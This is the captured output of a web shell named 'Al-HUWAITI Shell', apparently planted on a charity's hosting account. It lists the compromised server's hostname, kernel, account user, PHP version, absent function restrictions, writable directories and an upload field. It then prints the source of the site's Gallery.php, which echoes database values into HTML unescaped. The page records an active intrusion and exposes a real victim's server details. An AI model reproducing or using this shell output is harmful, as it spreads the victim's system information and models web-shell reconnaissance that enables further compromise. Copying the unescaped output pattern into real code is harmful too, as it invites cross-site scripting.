Al-HUWAITI Shell
Al-huwaiti


Server : LiteSpeed
System : Linux in-mum-web1949.main-hosting.eu 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
User : u595547767 ( 595547767)
PHP Version : 7.4.33
Disable Function : NONE
Directory :  /home/u595547767/domains/nilasevasamithi.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/u595547767/domains/nilasevasamithi.com/public_html/Gallery.php
<?php
    include_once('admin/connect.php');
    session_start();
    $id=session_id();
    $_SESSION['sessionid']=$id;
?>
<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="utf-8">
  <meta content="width=device-width, initial-scale=1.0" name="viewport">
  <title>Gallery - Nila Seva Samithi</title>
  <meta name="description" content="">
  <meta name="keywords" content="">

  <!-- Favicons -->
  <link href="assets/img/favicon.png" rel="icon">
  <link href="assets/img/apple-touch-icon.png" rel="apple-touch-icon">

  <!-- Fonts -->
  <link href="https://fonts.googleapis.com" rel="preconnect">
  <link href="https://fonts.gstatic.com" rel="preconnect" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&family=Raleway:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap" rel="stylesheet">

  <!-- Vendor CSS Files -->
  <link href="assets/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
  <link href="assets/vendor/bootstrap-icons/bootstrap-icons.css" rel="stylesheet">
  <link href="assets/vendor/aos/aos.css" rel="stylesheet">
  <link href="assets/vendor/glightbox/css/glightbox.min.css" rel="stylesheet">
  <link href="assets/vendor/swiper/swiper-bundle.min.css" rel="stylesheet">

  <!-- Main CSS File -->
  <link href="assets/css/main.css" rel="stylesheet">

  <!-- =======================================================
  * Template Name: Sailor
  * Template URL: https://bootstrapmade.com/sailor-free-bootstrap-theme/
  * Updated: Aug 07 2024 with Bootstrap v5.3.3
  * Author: BootstrapMade.com
  * License: https://bootstrapmade.com/license/
  ======================================================== -->
</head>

<body class="services-page">

    <header id="header" class="header sticky-top">

        <div class="topbar d-flex align-items-center dark-background">
          <div class="container d-flex justify-content-center justify-content-md-between">
            <div class="contact-info d-flex align-items-center">
              <i class="bi bi-envelope d-flex align-items-center"><a href="mailto:info@thannal.org">info@thannal.org</a></i>
              <i class="bi bi-phone d-flex align-items-center ms-4"><span>9447216144 / 04884285855</span></i>
            </div>
            <div class="social-links d-none d-md-flex align-items-center">
              <a href="#" class="twitter"><i class="bi bi-twitter-x"></i></a>
              <a href="#" class="facebook"><i class="bi bi-facebook"></i></a>
              <a href="#" class="instagram"><i class="bi bi-instagram"></i></a>
              <a href="#" class="linkedin"><i class="bi bi-linkedin"></i></a>
            </div>
          </div>
        </div><!-- End Top Bar -->
    
        <div class="branding">
    
          <div class="container position-relative d-flex align-items-center justify-content-between">
            <a href="index.php" class="logo d-flex align-items-center">
             
              <img src="assets/img/logo.png" alt="">
            </a>
    
            <nav id="navmenu" class="navmenu">
              <ul>
                <li><a href="index.php" class="active">Home</a></li>
                <li class="dropdown"><a href=""><span>About us</span> <i class="bi bi-chevron-down toggle-dropdown"></i></a>
                  <ul>
                    <li><a href="who-we-are.php">Who We Are</a></li>
                    <li><a href="whyus.php">Why Us</a></li>
                    <li><a href="Meet-our-team.php">Meet Our Team</a></li>
                  </ul>
                </li>
                <li class="dropdown"><a href="#"><span>Our Services</span> <i class="bi bi-chevron-down toggle-dropdown"></i></a>
                       <ul>
                 <?php
                  $selservice = mysqli_query($con,"SELECT * FROM tbl_services ORDER BY service_id ASC");
                  $i=1;
                  while($srow = mysqli_fetch_array($selservice)) {
                ?>
                  <li><a href="service_details.php?id=<?php echo  $srow['service_id']; ?>"><?php echo $srow['service_name']; ?></a></li>

                  <?php 
                   $i++;
                 }
                 ?>
                        
              </ul>
                </li>
                <li class="dropdown"><a href="#"><span>Media</span> <i class="bi bi-chevron-down toggle-dropdown"></i></a>
                  <ul>
                    <li><a href="Media.php">Media</a></li>
                    <li><a href="News-Letter.php">News letter</a></li>
                    <li><a href="Events.php">Events</a></li>
                    <li><a href="Gallery.php">Gallery</a></li>
                  </ul>
                </li>
                <li class="dropdown"><a href=""><span>Reports</span> <i class="bi bi-chevron-down toggle-dropdown"></i></a>
                  <ul>
                    <li><a href="Annual-Reports.php">Annual Reports</a></li>
                    
                  </ul>
                </li>
                
                <li><a href="CSR.php">CSR</a></li>
                <li class="dropdown"><a href=""><span>Get Involved</span> <i class="bi bi-chevron-down toggle-dropdown"></i></a>
                  <ul>
                    <li><a href="Volunteer.php">Volunteer</a></li>
                      <li><a href="Internship.php">Internship</a></li>
                      <li><a href="Work-with-us.php">Work with us</a></li> 
                    
                  </ul>
                </li>
               
                <li><a href="contact.php">Reach out to us</a></li>
                <div class="donatenow"><a href="donate.php">Donate Now</a></div>
              </ul>
              <i class="mobile-nav-toggle d-xl-none bi bi-list"></i>
            </nav>
    
          </div>
    
        </div>
        
      </header>
      

  <main class="main ab">

    <!-- Page Title -->
    <div class="page-title light-background">
      <div class="container d-lg-flex justify-content-between align-items-center">
        <h1 class="mb-2 mb-lg-0">Gallery</h1>
        <nav class="breadcrumbs">
          <ol>
            <li><a href="index.php">Home</a></li>
            <li class="current">Gallery</li>
          </ol>
        </nav>
      </div>
    </div><!-- End Page Title -->
 <!-- Portfolio Section -->
 <section id="portfolio" class="portfolio section">

  <div class="container">
  
          <div class="isotope-layout" data-default-filter="*" data-layout="masonry" data-sort="original-order">
  
            <ul class="portfolio-filters isotope-filters" data-aos="fade-up" data-aos-delay="100">
                <li data-filter="*" class="filter-active">All</li>
                 <?php
                        $selgallery1 = mysqli_query($con,"SELECT DISTINCT(gallery_type) FROM tbl_gallery ORDER BY gallery_type ASC");
                        $i=1;
                        while($grow1 = mysqli_fetch_array($selgallery1)) {
                      ?>   
              <li data-filter=".<?php echo $grow1['gallery_type']; ?>"><?php echo $grow1['gallery_type']; ?></li>
              <?php
                    $i++;
                }
              ?>

            </ul><!-- End Portfolio Filters -->
  
            <div class="row gy-4 isotope-container" data-aos="fade-up" data-aos-delay="200">
              <?php
                        $selgallery11 = mysqli_query($con,"SELECT DISTINCT(gallery_type),gallery_image FROM tbl_gallery ORDER BY gallery_type ASC");
                        $j=1;
                        while($grow11 = mysqli_fetch_array($selgallery11)) {
                      ?> 
              <div class="col-lg-4 col-md-6 portfolio-item isotope-item <?php echo $grow11['gallery_type']; ?>">
                <div class="portfolio-content h-100">
                  <img src="admin/<?php echo $grow11['gallery_image']; ?>" class="img-fluid" alt="">
                  <div class="portfolio-info">
                   
                    <a href="admin/<?php echo $grow11['gallery_image']; ?>" title="App 1" data-gallery="portfolio-gallery-app" class="glightbox preview-link"><i class="bi bi-zoom-in"></i></a>
                   
                  </div>
                </div>
              </div><!-- End Portfolio Item -->
              <?php
                        $j++;
                        }
                        ?>
  
             </div><!-- End Portfolio Container -->
  
          </div>
  
        </div>

</section><!-- /Portfolio Section -->
  </main>
   <?php
      include_once('footer.php');
    ?>

Al-HUWAITI Shell